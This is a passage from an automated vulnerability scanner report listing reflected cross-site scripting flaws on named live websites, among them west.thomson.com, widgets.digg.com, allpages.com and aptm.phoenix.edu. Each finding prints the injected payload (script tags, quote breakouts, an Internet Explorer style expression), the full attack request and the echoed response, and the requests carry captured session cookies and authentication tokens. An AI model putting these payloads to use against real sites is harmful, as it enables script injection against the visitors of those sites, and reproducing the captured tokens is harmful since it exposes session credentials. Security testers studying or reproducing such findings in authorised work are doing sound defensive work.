Cookie: ASP.NET_SessionId=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; s_cc=true; c_m2=1; c=undefinedDirect%20LoadDirect%20Load; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%5D; gpv_pn=default; s_sq=%5B%5BB%5D%5D; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; s_ppv=75; .WTCAUTH=06CA2923AD720AED00911CF592288E796D54EF811208119980F8FB37CA43273D9DFEC8C40F3C0D72C7F3F5BB3FA9C8F3C5E74EE348ECCA6B35E4E107909B01AE597FE9603A89811073C77C2D1CEF0DFCF4C3954A224BA70CB09C1F7BB4132B10277D7057D02CD5A348E567450BC9313BF64CF52EE76F06E0A742647B41E23ED82ABCD1F3EF162F1597FC356A16F46C4C3ECC94AE454D8BD3AE08271BA0F4BF28ED7AAD920CC0D4EB5DA1F49BB1CE5F414460A82807C25F612865975ED0388641DF48A052AE97A698D5F7B6FCE96AA4A5F527AD930E272A65F131FEF9F615E6BC8D4D124F; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; UserSiteIdIdentifier=

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:16:23 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: UserSiteIdIdentifier=; path=/
Set-Cookie: .WTCAUTH=4B92D06C1055BF1CDDBBBACB727FD4F43428482F7C563F0EA97F18B91DD9FD3F138B25C98AA96EBA38EDBC1589BA5D26B61808A57D0181247B61D3532602037BA027D5FCE7F6BE62C519A918C3C48B8A8A8D9BDF2BBF4D4EB2E67EAB361D4FD27CC98B24F6589E3D21287619AAA5AC80D7930280A1D86B07F463F3D62E9EECB79DED2B0B5C061287C1FD67F659A7EC02250606ED60FF5F38EB6D84D0F8F3B50821A280C3EF0E9122D3E78CAA9F50376CFBE7131D01B384AD1A9DB7762AC4912A915968CF8A1C156573D216989DE281CE5CE92FA4E43EF9F86851E9360F38B8EF61D571C0; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 69784


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<script language="JavaScript">
s.pageName="store:promotions:emailpreferences:login"
s.server="EG-SWGWEB-A02"
s.channel="Standard"
s.pageType=""
s.prop1="571419749d9";alert(1)//72d68614b4"
s.prop2=""
s.prop3=""
s.prop4=""
s.prop5=""
s.prop6=""
s.prop7=""
s.prop8=""
s.prop9=""
s.prop10=""
s.prop11=""
s.prop12=""
s.prop13=""
s.prop14=""
s.prop15=""
s.prop16=""
s.prop17=""
...[SNIP]...

5.182. https://west.thomson.com/support/customer-service/order-info.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://west.thomson.com
Path:   /support/customer-service/order-info.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8613a"style%3d"x%3aexpression(alert(1))"bb1d1f56e32 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8613a"style="x:expression(alert(1))"bb1d1f56e32 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /support/customer-service/order-info.aspx?8613a"style%3d"x%3aexpression(alert(1))"bb1d1f56e32=1 HTTP/1.1
Host: west.thomson.com
Connection: keep-alive
Referer: https://west.thomson.com/store/Promotions/EmailPreferences/Login.aspx?Mstr=wtc&PromCode=571419&FindingMethod=Navigation
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; SbasketVw=T; UserSiteIdIdentifier=; .WTCAUTH=E76869171E1A0ADDDC87DE0666682051A5ABA524C2901C7CCEF31A6788A7A438C98C00E7ABD27B50057AA9B35AF82318BE32CAAF21BCE46BA3E3E2EF6BAD7265022CF6605B0D106AF37CB15E717B49BE7FA125545B49CD98D1796358E96925E259D28F2A8CB5B16681BF5B9DE5EB533CEFC7E936BC98024D18199973772A2B0420054643FF9639F13C27CBBB80C1152B2BC7EF70BDEC6C72A6C3ED2F16912510EBC9C641BEB2DCBD2784D94A08DAC3A2CB0C92EBE86CA6DAE5A52262E83175C215F1D237D9058600C65D041AC94F24F8BD7FAFEA186A82F05284BBAB97540DA15E7C4840; s_cc=true; s_ppv=100; c_m2=1; c=undefined571419undefined; SC_LINKS=store%3Apromotions%3Aemailpreferences%3Alogin%5E%5EFree%20Ground%20Shipping%5E%5Estore%3Apromotions%3Aemailpreferences%3Alogin%20%7C%20Free%20Ground%20Shipping%5E%5E; s_ev48=%5B%5B%27Paid%2520Non-Search%27%2C%271303848274123%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%2C%5B%27Referrers%27%2C%271303849270372%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849306606%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849781175%27%5D%5D; gpv_pn=store%3Apromotions%3Aemailpreferences%3Alogin; s_sq=thwest%3D%2526pid%253Dstore%25253Apromotions%25253Aemailpreferences%25253Alogin%2526pidt%253D1%2526oid%253Dhttps%25253A//west.thomson.com/support/customer-service/order-info.aspx%252523freeshipping%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:20:15 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: UserSiteIdIdentifier=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 87803


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Head1"><m
...[SNIP]...
<a class="EmailPrintContactUsLink" href="javascript:void(0);"
onclick="javascript:PrintThisPage('http://west.thomson.com/support/customer-service/order-info.aspx?8613a"style="x:expression(alert(1))"bb1d1f56e32=1'); return false;" >
...[SNIP]...

5.183. http://widget.needle.itasoftware.com/widget/Matrix2.do [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://widget.needle.itasoftware.com
Path:   /widget/Matrix2.do

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 2ebca<script>alert(1)</script>6a2cf77656a was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /widget/Matrix2.do?domain=us-festivals&mode=concise&lat=25.7933333&long=-80.290556&startDate=4/30/2011&endDate=5/18/2011&callback=itandlEventsCallback2ebca<script>alert(1)</script>6a2cf77656a HTTP/1.1
Host: widget.needle.itasoftware.com
Proxy-Connection: keep-alive
Referer: http://matrix.itasoftware.com/view/details?session=9dec83c4-0dea-4ecc-8e10-94096c69ac61
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=269716137.1303847753.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=269716137.2091474344.1303847753.1303847753.1303847753.1; __utmc=269716137; __utmb=269716137.13.10.1303847753; JSESSIONID=1AA23091BF71FF338221489D9F6C0ECD.ita1needle6-reader

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:01:30 GMT
Server: Apache
Cache-Control: max-age=3600, public
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Vary: Accept-Encoding
Content-Type: text;charset=UTF-8
Set-Cookie: JSESSIONID=1AA23091BF71FF338221489D9F6C0ECD.ita1needle6-reader; Path=/; Domain=.internal.itasoftware.com; HttpOnly
Content-Length: 91171

itandlEventsCallback2ebca<script>alert(1)</script>6a2cf77656a({"results":[["The 16th Annual National Children\'s Theatre Festival","16th annual national childrens theatre festival the",[[["Actors\' Playhouse at the Miracle Theatre","actors playhouse at the mirac
...[SNIP]...

5.184. http://widgets.digg.com/buttons/count [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.digg.com
Path:   /buttons/count

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 67881<script>alert(1)</script>d4ca36e90c2 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /buttons/count?url=http%3A//xss.cx/2011/04/26/dork/reflected-xss-cross-site-scripting-cwe79-capec86-ghdb-shotssnapcom.html67881<script>alert(1)</script>d4ca36e90c2 HTTP/1.1
Host: widgets.digg.com
Proxy-Connection: keep-alive
Referer: http://xss.cx/2011/04/26/dork/reflected-xss-cross-site-scripting-cwe79-capec86-ghdb-shotssnapcom.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Age: 0
Date: Tue, 26 Apr 2011 19:09:51 GMT
Via: NS-CACHE: 100
Etag: "e28d056865b0e17fb91457313fb6a41551be8911"
Content-Length: 186
Server: TornadoServer/0.1
Content-Type: application/json
Accept-Ranges: bytes
Cache-Control: private, max-age=599
Expires: Tue, 26 Apr 2011 19:19:50 GMT
X-CDN: Cotendo
Connection: Keep-Alive

__DBW.collectDiggs({"url": "http://xss.cx/2011/04/26/dork/reflected-xss-cross-site-scripting-cwe79-capec86-ghdb-shotssnapcom.html67881<script>alert(1)</script>d4ca36e90c2", "diggs": 0});

5.185. http://widgetserver.com/syndication/subscriber/InsertPanel.js [panelId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgetserver.com
Path:   /syndication/subscriber/InsertPanel.js

Issue detail

The value of the panelId request parameter is copied into the HTML document as plain text between tags. The payload d0616<script>alert(1)</script>374cd424dc0 was submitted in the panelId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /syndication/subscriber/InsertPanel.js?panelId=0ed14c91-dfd4-497f-b04b-3d371abe7a5ed0616<script>alert(1)</script>374cd424dc0 HTTP/1.1
Host: widgetserver.com
Proxy-Connection: keep-alive
Referer: http://www.widgetbox.com/list/most_popular
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:46:17 GMT
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Connection: close
Content-Type: application/x-javascript;charset=UTF-8
Content-Length: 6119

//
//
//
if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"48996",urls:{runtimeBaseU
...[SNIP]...
</div>");

function libReadyCallback() {
var parent_node = document.getElementById(parentNodeId);
WIDGETBOX.subscriber.Main.insertPanel("0ed14c91-dfd4-497f-b04b-3d371abe7a5ed0616<script>alert(1)</script>374cd424dc0", parent_node);
}

WIDGETBOX.load("subscriber.Main", libReadyCallback, true);
//
})();

//EOF: subscriber/InsertPanel.js

5.186. http://www.allpages.com/ [980251%22';944334 parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.allpages.com
Path:   /

Issue detail

The value of the 980251%22';944334 request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 5aa12(a)acca7f1048c was submitted in the 980251%22';944334 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /?980251%22';9443345aa12(a)acca7f1048c HTTP/1.1
Host: www.allpages.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 19:11:17 GMT
Server: Apache/2.2.3 (Red Hat)
Accept-Ranges: bytes
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 48782

<html>
<head>

<title>AllPages.com - Browse by Category - Yellow Pages</title>


<meta name="Description" content="AllPages.com Yellow Pages provides business listings (name, address, phone, fax
...[SNIP]...
-
google_ad_client = "pub-9391190101442052";
/* 468x15 - www, created 4/1/11 */
google_ad_slot = "1086959395";
google_ad_width = 468;
google_ad_height = 15;
google_hints = ', , ?980251%22';9443345aa12(a)acca7f1048c';
//-->
...[SNIP]...

5.187. http://www.allpages.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.allpages.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 84a26(a)d3d1371b61f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /?980251%22';944334&84a26(a)d3d1371b61f=1 HTTP/1.1
Host: www.allpages.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 19:11:17 GMT
Server: Apache/2.2.3 (Red Hat)
Accept-Ranges: bytes
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 48787

<html>
<head>

<title>AllPages.com - Browse by Category - Yellow Pages</title>


<meta name="Description" content="AllPages.com Yellow Pages provides business listings (name, address, phone, fax
...[SNIP]...
google_ad_client = "pub-9391190101442052";
/* 468x15 - www, created 4/1/11 */
google_ad_slot = "1086959395";
google_ad_width = 468;
google_ad_height = 15;
google_hints = ', , ?980251%22';944334%2684a26(a)d3d1371b61f=1';
//-->
...[SNIP]...

5.188. http://www.aptm.phoenix.edu/ [channel parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aptm.phoenix.edu
Path:   /

Issue detail

The value of the channel request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 68743"%3balert(1)//bb61ffcaafd was submitted in the channel parameter. This input was echoed as 68743";alert(1)//bb61ffcaafd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dir&channel=banr68743"%3balert(1)//bb61ffcaafd&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1
Host: www.aptm.phoenix.edu
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:48:47 GMT
Server: Apache/2.2.3 (CentOS)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT+00:00
X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181439)/JBossWeb-2.0
Set-Cookie: linkplidlist=47054; Domain=.phoenix.edu; Path=/
Set-Cookie: crk=135047407.5; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:02:54 GMT; Path=/
Set-Cookie: vid=51921951; Domain=.phoenix.edu; Path=/
Set-Cookie: country=US; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:02:54 GMT; Path=/
Set-Cookie: postal_code=5672; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:02:54 GMT; Path=/
Set-Cookie: plid=47054; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:02:54 GMT; Path=/
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 44264

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca
...[SNIP]...
<!--
       setDestURLExists(true);
       setDestURL("/AptiNet/hhs?pid=62A1E89CCBA3FB2D&pvp_design=&kw=&kw=&channel=banr68743";alert(1)//bb61ffcaafd&category=&psrc=&psrc_url=&vrefid=&creative_id=38954353&creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&keyword=msn_careers_728x90_425006&v1=aptm&v2=&v3=&v4=&v5=&v6=&v7=&v8=&country_codes=&country=&
...[SNIP]...

5.189. http://www.aptm.phoenix.edu/ [classification parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aptm.phoenix.edu
Path:   /

Issue detail

The value of the classification request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86e94"%3balert(1)//5616609a231 was submitted in the classification parameter. This input was echoed as 86e94";alert(1)//5616609a231 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dir&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply86e94"%3balert(1)//5616609a231&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1
Host: www.aptm.phoenix.edu
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:49:49 GMT
Server: Apache/2.2.3 (CentOS)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT+00:00
X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181439)/JBossWeb-2.0
Set-Cookie: linkplidlist=48332; Domain=.phoenix.edu; Path=/
Set-Cookie: crk=134809677.2; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:03:56 GMT; Path=/
Set-Cookie: vid=51922085; Domain=.phoenix.edu; Path=/
Set-Cookie: country=US; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:03:56 GMT; Path=/
Set-Cookie: postal_code=5672; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:03:56 GMT; Path=/
Set-Cookie: plid=48332; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:03:56 GMT; Path=/
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 44477

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca
...[SNIP]...
7_9_95&pvp_campaign_int=&level_education=&foreign_credit=&military=&us_citizen=&pvp_page1_orderid=&kwmatch=all&unit=dir&provider=MSN&initiative=gen&mktg_prog=gen&version=728x90&classification=dir_dsply86e94";alert(1)//5616609a231&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&user3=1&user4=&user5=&clientdelivery=&registered_nurse=&mvtkey=");
   
       setAllowDestURLOnSubmit(true);
   

   /* an_arr's params
    * 0 - poid
   
...[SNIP]...

5.190. http://www.aptm.phoenix.edu/ [creative_desc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aptm.phoenix.edu
Path:   /

Issue detail

The value of the creative_desc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7d075"%3balert(1)//51083a8fbe0 was submitted in the creative_desc parameter. This input was echoed as 7d075";alert(1)//51083a8fbe0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf7d075"%3balert(1)//51083a8fbe0&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dir&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1
Host: www.aptm.phoenix.edu
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:47:18 GMT
Server: Apache/2.2.3 (CentOS)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT+00:00
X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181439)/JBossWeb-2.0
Set-Cookie: linkplidlist=48598; Domain=.phoenix.edu; Path=/
Set-Cookie: crk=134809621.2; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:01:25 GMT; Path=/
Set-Cookie: vid=51921737; Domain=.phoenix.edu; Path=/
Set-Cookie: country=US; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:01:25 GMT; Path=/
Set-Cookie: postal_code=5672; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:01:25 GMT; Path=/
Set-Cookie: plid=48598; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:01:25 GMT; Path=/
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 44092

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca
...[SNIP]...
LExists(true);
       setDestURL("/AptiNet/hhs?pid=62A1E89CCBA3FB2D&pvp_design=&kw=&kw=&channel=banr&category=&psrc=&psrc_url=&vrefid=&creative_id=38954353&creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf7d075";alert(1)//51083a8fbe0&keyword=msn_careers_728x90_425006&v1=aptm&v2=&v3=&v4=&v5=&v6=&v7=&v8=&country_codes=&country=&salutation=&first_name=&last_name=&email_address=&address=&address_2=&city=&state=&postal_code_int=&postal
...[SNIP]...

5.191. http://www.aptm.phoenix.edu/ [creative_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aptm.phoenix.edu
Path:   /

Issue detail

The value of the creative_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6605f"%3balert(1)//45adfdbe294 was submitted in the creative_id parameter. This input was echoed as 6605f";alert(1)//45adfdbe294 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dir&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=389543536605f"%3balert(1)//45adfdbe294&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1
Host: www.aptm.phoenix.edu
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:51:33 GMT
Server: Apache/2.2.3 (CentOS)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT+00:00
